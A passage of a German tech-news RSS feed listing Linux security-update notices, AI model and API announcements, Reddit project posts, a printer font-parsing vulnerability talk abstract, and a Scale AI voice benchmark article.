<content:encoded><![CDATA[Consumer complaints about Ticketmaster are so voluminous at state attorneys general offices that Pennsylvania's comes with an explicit plea for residents lodging a grievance about the company to be patient for a response. That kind of pressure has driven more than 30 states to push forward with claims that Live Nation-Ticketmaster illegally monopolized parts of […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by Debian (firefox-esr, postgresql-13, and tiff), Fedora (bind, bind-dyndb-ldap, cef, opensc, python-biopython, python-pydicom, and roundcubemail), Slackware (mozilla), SUSE (ckermit, cockpit-repos, dnsdist, expat, freerdp, git-cliff, gnutls, heroic-games-launche...]]></description>
<link>https://tsecurity.de/de/3420585/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3420585/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 09 Apr 2026 15:25:21 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (firefox-esr, postgresql-13, and tiff), <b>Fedora</b> (bind, bind-dyndb-ldap, cef, opensc, python-biopython, python-pydicom, and roundcubemail), <b>Slackware</b> (mozilla), <b>SUSE</b> (ckermit, cockpit-repos, dnsdist, expat, freerdp, git-cliff, gnutls, heroic-games-launcher, libeverest, openssl-1_1, openssl-3, polkit, python-poetry, python-requests, python311-social-auth-app-django, and SDL2_image-devel), and <b>Ubuntu</b> (dogtag-pki, gdk-pixbuf, linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gke,
 linux-gkeop, linux-ibm, linux-ibm-5.15, linux-intel-iotg,
 linux-intel-iotg-5.15, linux-kvm, linux-lowlatency,
 linux-lowlatency-hwe-5.15, linux-nvidia, linux-nvidia-tegra,
 linux-nvidia-tegra-igx, linux-oracle, linux-oracle-5.15, linux-raspi,
 linux-xilinx-zynqmp, linux-aws-6.8, linux-gcp-6.8, linux-hwe-6.8, linux-ibm-6.8,
 linux-lowlatency-hwe-6.8, linux-fips, linux-aws-fips, linux-gcp-fips, linux-oracle, linux-oracle-6.17, linux-raspi, linux-realtime, openssl, and squid).]]></content:encoded>
</item>
<item>
<title><![CDATA[Self-Hosted Backend: Appwrite 1.9 bringt MongoDB]]></title>
<description><![CDATA[Appwrite 1.9 bringt MongoDB-Support, ressourcenbasierte API-Keys und Query-Filter für Realtime-Subscriptions. Hinzu kommen Performance- und Compute-Updates.]]></description>
<link>https://tsecurity.de/de/3414283/it-nachrichten/self-hosted-backend-appwrite-19-bringt-mongodb/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3414283/it-nachrichten/self-hosted-backend-appwrite-19-bringt-mongodb/</guid>
<pubDate>Tue, 07 Apr 2026 16:02:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Appwrite 1.9 bringt MongoDB-Support, ressourcenbasierte API-Keys und Query-Filter für Realtime-Subscriptions. Hinzu kommen Performance- und Compute-Updates.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (crun, kernel, and kernel-rt), Debian (dovecot), Fedora (calibre and nextcloud), Mageia (freerdp, polkit-122, python-nltk, python-pyasn1, vim, and xz), Red Hat (edk2 and openssl), SUSE (avahi, cockpit, python-pyOpenSSL, python311, and tar), and Ubunt...]]></description>
<link>https://tsecurity.de/de/3414113/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3414113/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 07 Apr 2026 15:10:28 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (crun, kernel, and kernel-rt), <b>Debian</b> (dovecot), <b>Fedora</b> (calibre and nextcloud), <b>Mageia</b> (freerdp, polkit-122, python-nltk, python-pyasn1, vim, and xz), <b>Red Hat</b> (edk2 and openssl), <b>SUSE</b> (avahi, cockpit, python-pyOpenSSL, python311, and tar), and <b>Ubuntu</b> (lambdaisland-uri-clojure, linux-gcp, linux-gcp-4.15, linux-gcp-fips, linux-oem-6.17, and linux-realtime-6.17).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (freerdp, grafana, kernel, rsync, and thunderbird), Debian (chromium, inetutils, and libpng1.6), Fedora (bind9-next, nginx-mod-modsecurity, and openbao), Mageia (firefox, nss and thunderbird), Red Hat (container-tools:rhel8), SUSE (conftest, dnsdist,...]]></description>
<link>https://tsecurity.de/de/3405534/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3405534/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 03 Apr 2026 15:26:59 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (freerdp, grafana, kernel, rsync, and thunderbird), <b>Debian</b> (chromium, inetutils, and libpng1.6), <b>Fedora</b> (bind9-next, nginx-mod-modsecurity, and openbao), <b>Mageia</b> (firefox, nss and thunderbird), <b>Red Hat</b> (container-tools:rhel8), <b>SUSE</b> (conftest, dnsdist, ignition, libsoup, libsoup2, LibVNCServer, libXvnc-devel, opensc, ovmf-202602, perl-Crypt-URandom, python-tornado, python311-ecdsa, python311-Pygments, python315, tar, and wireshark), and <b>Ubuntu</b> (cairo, jpeg-xl, linux, linux-aws, linux-aws-6.17, linux-gcp, linux-gcp-6.17,
 linux-hwe-6.17, linux-realtime, linux, linux-aws, linux-aws-hwe, linux-kvm, linux-oracle, linux, linux-aws, linux-gcp, linux-gke, linux-gkeop, linux-ibm,
 linux-lowlatency, linux-nvidia, linux-raspi, linux-fips, linux-fips, linux-aws-fips, linux-fips, linux-aws-fips, linux-gcp-fips, and linux-realtime, linux-realtime-6.8, linux-raspi-realtime).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (python3.11, python3.12, squid, and thunderbird), Debian (gst-plugins-bad1.0 and gst-plugins-ugly1.0), Fedora (bpfman, crun, gnome-remote-desktop, polkit, python3.14, rust-rustls-webpki, rust-sccache, rust-scx_layered, rust-scx_rustland, rust-scx_rus...]]></description>
<link>https://tsecurity.de/de/3402785/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3402785/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 02 Apr 2026 15:26:14 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (python3.11, python3.12, squid, and thunderbird), <b>Debian</b> (gst-plugins-bad1.0 and gst-plugins-ugly1.0), <b>Fedora</b> (bpfman, crun, gnome-remote-desktop, polkit, python3.14, rust-rustls-webpki, rust-sccache, rust-scx_layered, rust-scx_rustland, rust-scx_rusty, and scap-security-guide), <b>Oracle</b> (freerdp, gstreamer1-plugins-bad-free, gstreamer1-plugins-base, gstreamer1-plugins-good, and gstreamer1-plugins-ugly-free, kernel, libxslt, python3.11, python3.12, squid, and thunderbird), <b>SUSE</b> (389-ds, busybox, chromium, cosign, curl, docker-compose, exiv2, expat, firefox, freerdp, freerdp2, gstreamer-plugins-ugly, harfbuzz, heroic-games-launcher, ImageMagick, kea, keylime, libjxl, librsvg, libsodium, libsoup, net-snmp, net-tools, netty, nghttp2, poppler, postgresql13, postgresql16, postgresql17, postgresql18, protobuf, python-black, python-orjson, python-pyasn1, python-pyOpenSSL, python-tornado, python-tornado6, python311-nltk, thunderbird, tomcat10, tomcat11, vim, and xen), and <b>Ubuntu</b> (kernel, linux, linux-aws, linux-kvm, linux-lts-xenial, linux-raspi, linux-raspi, linux-raspi-realtime, rust-cargo-c, rust-tar, and undertow).]]></content:encoded>
</item>
<item>
<title><![CDATA[Build real-time multimodal agents with Gemini and Pipecat]]></title>
<description><![CDATA[Author: Google for Developers - Bewertung: 11x - Views:131 Chad Bailey from the Pipecat team walks through what's possible with the new Gemini 3 multimodal real-time model: flight search, lodging lookup, Google Search grounding, trip report generation, and a language tutor agent, all in a single ...]]></description>
<link>https://tsecurity.de/de/3397266/videos/build-real-time-multimodal-agents-with-gemini-and-pipecat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3397266/videos/build-real-time-multimodal-agents-with-gemini-and-pipecat/</guid>
<pubDate>Tue, 31 Mar 2026 21:16:54 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Google for Developers - Bewertung: 11x - Views:131 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/Fk2t9AG721E?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Chad Bailey from the Pipecat team walks through what's possible with the new Gemini 3 multimodal real-time model: flight search, lodging lookup, Google Search grounding, trip report generation, and a language tutor agent, all in a single voice conversation.<br />
<br />
Note: The public string for this model is gemini-3.1-flash-live. The string used in the video is for the Early Access Partner program and is now turned down.<br />
<br />
What's covered: Scaffolding a bot with the Pipecat CLI, configuring Gemini 3 with minimal thinking for lower latency, writing system prompts that hold up across long conversations, defining and registering tool calls, enabling Google Search grounding, saving trip reports to disk, and running multiple agents in a single bot file with Pipecat Agents. <br />
<br />
What are you building with Gemini Live API? Drop it in the comments.<br />
<br />
Resources:<br />
Gemini Live API overview → https://goo.gle/47vg4Tc <br />
Get started at pipecat.ai → https://goo.gle/4ch4LAx <br />
Pipecat examples → https://goo.gle/4uYe93z <br />
<br />
Subscribe to Google for Developers → https://goo.gle/developers <br />
<br />
Speaker: Chad Bailey from the Pipecat<br />
Products Mentioned: Google AI, Gemini<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Alibaba Qwen Team Releases Qwen3.5 Omni: A Native Multimodal Model for Text, Audio, Video, and Realtime Interaction]]></title>
<description><![CDATA[The landscape of multimodal large language models (MLLMs) has shifted from experimental ‘wrappers’—where separate vision or audio encoders are stitched onto a text-based backbone—to native, end-to-end ‘omnimodal’ architectures. Alibaba Qwen team latest release, Qwen3.5-Omni, represents a signific...]]></description>
<link>https://tsecurity.de/de/3394970/ai-nachrichten/alibaba-qwen-team-releases-qwen35-omni-a-native-multimodal-model-for-text-audio-video-and-realtime-interaction/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3394970/ai-nachrichten/alibaba-qwen-team-releases-qwen35-omni-a-native-multimodal-model-for-text-audio-video-and-realtime-interaction/</guid>
<pubDate>Tue, 31 Mar 2026 07:18:07 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The landscape of multimodal large language models (MLLMs) has shifted from experimental ‘wrappers’—where separate vision or audio encoders are stitched onto a text-based backbone—to native, end-to-end ‘omnimodal’ architectures. Alibaba Qwen team latest release, Qwen3.5-Omni, represents a significant milestone in this evolution. Designed as a direct competitor to flagship models like Gemini 3.1 Pro, the Qwen3.5-Omni […]</p>
<p>The post <a href="https://www.marktechpost.com/2026/03/30/alibaba-qwen-team-releases-qwen3-5-omni-a-native-multimodal-model-for-text-audio-video-and-realtime-interaction/">Alibaba Qwen Team Releases Qwen3.5 Omni: A Native Multimodal Model for Text, Audio, Video, and Realtime Interaction</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Working on a modern zero copy gpu screen recorder like screen[dot]studio for wayland]]></title>
<description><![CDATA[Hey, so past these few weeks I have been working on a project inspired from gpu-screen-recorder. It is built with the same idea of zero-copy gpu screen recording, where I export the scanout planes/fbos as dmabufs with the drm-kms kernel api and then encode them in realtime. My goal was to build s...]]></description>
<link>https://tsecurity.de/de/3391769/linux-tipps/working-on-a-modern-zero-copy-gpu-screen-recorder-like-screendotstudio-for-wayland/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3391769/linux-tipps/working-on-a-modern-zero-copy-gpu-screen-recorder-like-screendotstudio-for-wayland/</guid>
<pubDate>Mon, 30 Mar 2026 05:27:45 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hey, so past these few weeks I have been working on a project inspired from gpu-screen-recorder. It is built with the same idea of zero-copy gpu screen recording, where I export the scanout planes/fbos as dmabufs with the drm-kms kernel api and then encode them in realtime.</p> <p>My goal was to build something like screen[dot]studio for linux. I know, you would probably say "just use OBS", I have, it's just not what I want and configuring it to do what I want would be a lot of work.</p> <p>So, far I have added support for VAAPI, QuickSync, Vulkan, CPU (ofc), and NVENC. codecs: H264, H265, AV1. dozens of rate control methods like icq, cqp, vbr, cbr and more. Cfr/Vfr. Sane quality presets and tuning. Calorimetery: bt601, bt709, bt2020. I use gstreamer for the encoding pipeline, but ffmpeg encoders are certainly possible with gstreamer as well.</p> <p>After the whole recording pipeline was stable I decided to add more features to it, like</p> <ul> <li>custom cursor sprites (you can choose your own cursors from anywhere, adjust scale)</li> <li>smooth cursor motion that is very configurable (adjust dampness, smoothness, velocity)</li> <li>follow cursor/zoom (wip, but probably the most important feature)</li> </ul> <p>Getting global mouse tracking to work on wayland took a lot of days for testing and coming up with strategies thanks to wayland's "secure" design, I almost gave up a few times.</p> <p>So, I just wanted to ask the community a few questions:</p> <ul> <li>Would you be willing for pay a lifetime fee for something like this? like $10. I know the norm with linux community is to reject any kind of software that's "proprietary" or requires you to pay. I haven't decided on whether I should monetize this, if there's no one paying, I might as well just open-source it for everyone.</li> <li>Should I work on X11 support, do people even use X11 daily, every major distro seems to be dropping support for X11. Is it even worth it?</li> </ul> <p>Thank you.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/garamgaramsamose"> /u/garamgaramsamose </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1s6tzpi/working_on_a_modern_zero_copy_gpu_screen_recorder/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1s6tzpi/working_on_a_modern_zero_copy_gpu_screen_recorder/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Build real-time conversational agents with Gemini 3.1 Flash Live]]></title>
<description><![CDATA[Google is launching Gemini 3.1 Flash Live via the Live API in Google AI Studio, for building realtime voice and vision agents.]]></description>
<link>https://tsecurity.de/de/3383851/it-nachrichten/build-real-time-conversational-agents-with-gemini-31-flash-live/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3383851/it-nachrichten/build-real-time-conversational-agents-with-gemini-31-flash-live/</guid>
<pubDate>Thu, 26 Mar 2026 16:32:15 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/build_with_gemini-3.1-flash-liv.max-600x600.format-webp.webp">Google is launching Gemini 3.1 Flash Live via the Live API in Google AI Studio, for building realtime voice and vision agents.]]></content:encoded>
</item>
<item>
<title><![CDATA[I built a full Google Drive client for Linux using rclone: systemd services, bi-directional sync, conflict resolution, and a KDE Dolphin overlay plugin]]></title>
<description><![CDATA[Google Drive Desktop doesn't exist for Linux. The usual workarounds are either a bare rclone mount command you have to restart manually, or a paid app like InSync. I wanted something closer to what macOS and Windows users get natively, so I built it. Note: version shows vdev when running from sou...]]></description>
<link>https://tsecurity.de/de/3378549/linux-tipps/i-built-a-full-google-drive-client-for-linux-using-rclone-systemd-services-bi-directional-sync-conflict-resolution-and-a-kde-dolphin-overlay-plugin/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3378549/linux-tipps/i-built-a-full-google-drive-client-for-linux-using-rclone-systemd-services-bi-directional-sync-conflict-resolution-and-a-kde-dolphin-overlay-plugin/</guid>
<pubDate>Wed, 25 Mar 2026 02:53:11 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Google Drive Desktop doesn't exist for Linux. The usual workarounds are either a bare <code>rclone mount</code> command you have to restart manually, or a paid app like InSync. I wanted something closer to what macOS and Windows users get natively, so I built it.</p> <p><a href="https://preview.redd.it/mwsbkintczqg1.png?width=464&amp;format=png&amp;auto=webp&amp;s=904ccd51f9079600d6101c2dceda05d993f195c2">Note: version shows vdev when running from source, released builds display the actual version number</a></p> <p><strong>What it does</strong></p> <ul> <li>All Drive files appear instantly in your file manager regardless of Drive size, files download only when you open them</li> <li>Local saves upload to Drive in the background</li> <li>Bi-directional folder sync (Documents, Pictures, Desktop, etc.) to Drive under <code>MyComputers/[hostname]/</code> , shows up in the Drive web UI exactly like Google Drive Desktop's Backup and Sync</li> <li>Conflict copies created automatically when the same file is edited on two devices simultaneously, named in Google Drive's own format (<code>report (conflict copy 2024-01-15 14:32 myhostname).txt</code>)</li> <li>Desktop notifications for errors, auth expiry, rate limits, and upload completions</li> <li>Everything starts on login and survives reboots via systemd user services</li> <li>Multi-drive support, personal + work Drive with isolated services and ports</li> </ul> <p><strong>The KDE part</strong></p> <p>If you use Dolphin, there's an optional C++ plugin that adds per-file sync status overlays directly in the file manager, green checkmark for synced, arrow for pending upload, red X for conflict. It reads local cache metadata and the conflict manifest only, zero API calls, no performance impact. Works with both KF5 and KF6.</p> <p><strong>Installation</strong></p> <pre><code>git clone https://github.com/AndreaCovelli/rclone-gdrive-setup.git cd rclone-gdrive-setup ./install.sh gdrive </code></pre> <p>The installer walks you through rclone config if you haven't set it up yet, installs and enables all services, and optionally runs the folder sync setup wizard.</p> <p><strong>Tech stack</strong></p> <ul> <li>rclone VFS mount with on-demand download</li> <li>Four coordinated systemd user services per remote</li> <li>Python daemon for conflict detection (MD5 manifest + bisync conflict markers)</li> <li>Python daemon for bi-directional folder sync via <code>rclone bisync</code></li> <li>C++ KDE plugin for Dolphin overlay icons</li> <li>inotifywait for near-realtime local→cloud propagation (~3s debounce)</li> </ul> <p><strong>Honest limitations</strong></p> <ul> <li>Ubuntu/Debian only for the installer (the scripts themselves work anywhere rclone does)</li> <li>Cloud→local changes take up to 30s to appear (rclone poll interval), Google Drive Desktop is faster here</li> <li>The Dolphin plugin is KDE only, no GNOME/Nautilus equivalent yet</li> <li>Requires Python 3.8+ and rclone</li> <li>Full roadmap and architecture notes in <a href="https://github.com/AndreaCovelli/rclone-gdrive-setup/blob/main/CONTRIBUTING.md">CONTRIBUTING.md</a>.</li> </ul> <p><strong>License:</strong> MIT</p> <p>Repo: <a href="https://github.com/AndreaCovelli/rclone-gdrive-setup">github.com/AndreaCovelli/rclone-gdrive-setup</a></p> <p>Happy to answer questions about the implementation here. For bugs or installation issues, GitHub issues are the best place so others can find the answers too.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/AndJ_"> /u/AndJ_ </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1s2birt/i_built_a_full_google_drive_client_for_linux/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1s2birt/i_built_a_full_google_drive_client_for_linux/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by Debian (strongswan and vlc), Fedora (cmake, giflib, and python-diskcache), SUSE (curl, docker-stable, freeciv, freerdp, freerdp2, freetype2, go1.25-openssl, go1.26-openssl, GraphicsMagick, gvfs, harfbuzz, kernel, lemon, libpng16, librsvg, libsodium, libsoup, n...]]></description>
<link>https://tsecurity.de/de/3376699/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3376699/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 24 Mar 2026 14:10:20 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (strongswan and vlc), <b>Fedora</b> (cmake, giflib, and python-diskcache), <b>SUSE</b> (curl, docker-stable, freeciv, freerdp, freerdp2, freetype2, go1.25-openssl, go1.26-openssl, GraphicsMagick, gvfs, harfbuzz, kernel, lemon, libpng16, librsvg, libsodium, libsoup, net-snmp, protobuf, python-Authlib, python-maturin, python-tornado6, python310, python311-pypdf, python311-PyPDF2, python314, python39, rust-keylime, strongswan, systemd, ucode-intel, util-linux, and vim), and <b>Ubuntu</b> (gvfs, linux-aws-6.8, linux-azure, linux-azure, linux-azure-4.15, linux-azure-fips, linux-hwe-5.4, linux-ibm, linux-intel-iot-realtime, linux-nvidia-tegra-igx, linux-realtime-6.17, pyopenssl, rust-sized-chunks, strongswan, systemd, and tiff).]]></content:encoded>
</item>
<item>
<title><![CDATA[Introducing the Realtime API]]></title>
<description><![CDATA[Developers can now build fast speech-to-speech experiences into their applications]]></description>
<link>https://tsecurity.de/de/3372337/ai-nachrichten/introducing-the-realtime-api/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3372337/ai-nachrichten/introducing-the-realtime-api/</guid>
<pubDate>Mon, 23 Mar 2026 09:28:29 +0100</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Developers can now build fast speech-to-speech experiences into their applications]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI o1 and new tools for developers]]></title>
<description><![CDATA[Introducing OpenAI o1, Realtime API improvements, a new fine-tuning method and more for developers.]]></description>
<link>https://tsecurity.de/de/3372298/ai-nachrichten/openai-o1-and-new-tools-for-developers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3372298/ai-nachrichten/openai-o1-and-new-tools-for-developers/</guid>
<pubDate>Mon, 23 Mar 2026 09:27:35 +0100</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Introducing OpenAI o1, Realtime API improvements, a new fine-tuning method and more for developers.]]></content:encoded>
</item>
<item>
<title><![CDATA[No-code personal agents, powered by GPT-4.1 and Realtime API]]></title>
<description><![CDATA[Learn how Genspark built a $36M ARR AI product in 45 days—with no-code agents powered by GPT-4.1 and OpenAI Realtime API.]]></description>
<link>https://tsecurity.de/de/3372183/ai-nachrichten/no-code-personal-agents-powered-by-gpt-41-and-realtime-api/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3372183/ai-nachrichten/no-code-personal-agents-powered-by-gpt-41-and-realtime-api/</guid>
<pubDate>Mon, 23 Mar 2026 09:24:53 +0100</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Learn how Genspark built a $36M ARR AI product in 45 days—with no-code agents powered by GPT-4.1 and OpenAI Realtime API.]]></content:encoded>
</item>
<item>
<title><![CDATA[Introducing gpt-realtime and Realtime API updates]]></title>
<description><![CDATA[We’re releasing a more advanced speech-to-speech model and new API capabilities including MCP server support, image input, and SIP phone calling support.]]></description>
<link>https://tsecurity.de/de/3372131/ai-nachrichten/introducing-gpt-realtime-and-realtime-api-updates/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3372131/ai-nachrichten/introducing-gpt-realtime-and-realtime-api-updates/</guid>
<pubDate>Mon, 23 Mar 2026 09:23:41 +0100</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[We’re releasing a more advanced speech-to-speech model and new API capabilities including MCP server support, image input, and SIP phone calling support.]]></content:encoded>
</item>
<item>
<title><![CDATA[Typographic Hitjob: When fonts pull the trigger | Peter Geissler]]></title>
<description><![CDATA[Author: Kaspersky - Bewertung: 0x - Views:0 In the world of embedded devices, printers often fly under the radar of traditional  security assessments — yet they remain trusted endpoints on most corporate networks.

In Taste The Failure we explore some critical vulnerabilities in a in-house TrueTy...]]></description>
<link>https://tsecurity.de/de/3371183/malware-trojaner-viren/typographic-hitjob-when-fonts-pull-the-trigger-peter-geissler/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3371183/malware-trojaner-viren/typographic-hitjob-when-fonts-pull-the-trigger-peter-geissler/</guid>
<pubDate>Sun, 22 Mar 2026 22:31:12 +0100</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Kaspersky - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/yYbt9N183X0?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>In the world of embedded devices, printers often fly under the radar of traditional  security assessments — yet they remain trusted endpoints on most corporate networks.<br />
<br />
In Taste The Failure we explore some critical vulnerabilities in a in-house TrueType Font (TTF) parsing library embedded in Canon printer firmware. By feeding  a specially crafted font to a targeted device, attackers can exploit this parsing  flaw to execute arbitrary code, pivot into internal networks, or exfiltrate sensitive data.<br />
<br />
This talk walks through the discovery, reverse engineering, and exploitation of the bug, and demonstrates how something as innocuous as a font file can become a foothold for a  full-scale attack.<br />
<br />
If you enjoy printers, binary exploitation and obscure realtime operating systems; this is for you!<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Scale AI launches Voice Showdown, the first real-world benchmark for voice AI — and the results are humbling for some top models]]></title>
<description><![CDATA[Voice AI is moving faster than the tools we use to measure it. Every major AI lab — OpenAI, Google DeepMind, Anthropic, xAI — is racing to ship voice models capable of natural, real-time conversation. But the benchmarks used to evaluate those models are largely still running on synthetic speech, ...]]></description>
<link>https://tsecurity.de/de/3367683/it-nachrichten/scale-ai-launches-voice-showdown-the-first-real-world-benchmark-for-voice-ai-and-the-results-are-humbling-for-some-top-models/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3367683/it-nachrichten/scale-ai-launches-voice-showdown-the-first-real-world-benchmark-for-voice-ai-and-the-results-are-humbling-for-some-top-models/</guid>
<pubDate>Fri, 20 Mar 2026 18:46:47 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Voice AI is moving faster than the tools we use to measure it. Every major AI lab — OpenAI, Google DeepMind, Anthropic, xAI — is racing to ship voice models capable of natural, real-time conversation. </p><p>But the benchmarks used to evaluate those models are largely still running on synthetic speech, English-only prompts, and scripted test sets that bear little resemblance to how people actually talk.</p><p><a href="https://scale.com/">Scale AI</a>, the large data annotation startup <a href="https://www.bloomberg.com/news/articles/2025-06-16/scale-ai-s-alexandr-wang-brings-meta-his-extensive-competitor-knowledge">whose founder was poached by Meta last year to lead its Superintelligence Lab</a>, is still going strong and tackling the problem head on: today it launches <a href="https://labs.scale.com/showdown">Voice Showdown</a>, what it calls the first global preference-based arena designed to benchmark voice AI through the lens of real human interaction. </p><p>This product offers a unique strategic value to users: free access to the world’s leading frontier models. Through Scale’s ChatLab platform, users can interact with high-tier models—which typically require multiple $20-per-month subscriptions—at no cost. In exchange, users participate in occasional blind, head-to-head "battles" to choose which of two anonymized leading voice models offers a better experience, providing data for the industry’s most authentic, human-preference leaderboard of voice AI models.</p><p>"Voice AI is really the fastest moving frontier in AI right now," said Janie Gu, product manager for Showdown at Scale AI. "But the way that we evaluate voice models hasn't kept up."</p><p>The results, drawn from thousands of spontaneous voice conversations across more than 60 languages, reveal capability gaps that other benchmarks have consistently missed.</p><h2><b>How Scale's Voice Showdown works</b></h2><p>Voice Showdown is built on ChatLab, Scale's model-agnostic chat platform where users can freely interact with whichever frontier AI model they choose — for free — within a single app. The platform has been available to Scale's global community of over 500,000 annotators, with roughly 300,000 having submitted at least one prompt. Scale is opening the platform to a public waitlist today.</p><p>The evaluation mechanism is elegant in its simplicity: while a user is having a natural voice conversation with a model, the system occasionally — on fewer than 5% of all voice prompts — surfaces a blind side-by-side comparison. The same prompt is sent to a second, anonymous model, and the user picks which response they prefer.</p><p>This design solves three problems that plague existing voice benchmarks.</p><p>First, every prompt comes from real human speech — with accents, background noise, half-finished sentences, and conversational filler — rather than synthesized audio generated from text. </p><p>Second, the platform spans more than 60 languages across 6 continents, with over a third of battles occurring in non-English languages including Spanish, Arabic, Japanese, Portuguese, Hindi, and French. </p><p>Third, because battles occur within users' actual daily conversations, 81% of prompts are conversational or open-ended — questions without a single correct answer. That rules out automated scoring and makes human preference the only credible signal.</p><p>Voice Showdown currently runs two evaluation modes: Dictate (users speak, models respond with text) and Speech-to-Speech, or S2S (Speech-to-Speech, users speak, models talk back). A third mode — Full Duplex, which captures real-time, interruptible conversation — is in development.</p><h2><b>Incentive-aligned voting</b></h2><p>One design detail sets Voice Showdown apart from Chatbot Arena (LM Arena), the text benchmark it most closely resembles. In LM Arena, critics have noted that users sometimes cast throwaway votes with little stake in the outcome. Voice Showdown addresses this directly: after a user votes for the model they preferred, the app switches them to that model for the rest of their conversation. If you voted for GPT-4o Audio over Gemini, you're now talking to GPT-4o Audio. That alignment of consequence with preference discourages casual or dishonest voting.</p><p>The system also controls for confounds that could corrupt comparisons: both model responses begin streaming simultaneously (eliminating speed bias), voice gender is matched across both options (eliminating gender preference bias), and neither model is identified by name during voting.</p><h2><b>The new Voice AI leaderboard every enterprise decision-maker should pay attention to</b></h2><p>Voice Showdown launches with 11 frontier models evaluated across 52 model-voice pairs as of March 18, 2026. Not all models support both evaluation modes — the Dictate leaderboard includes 8 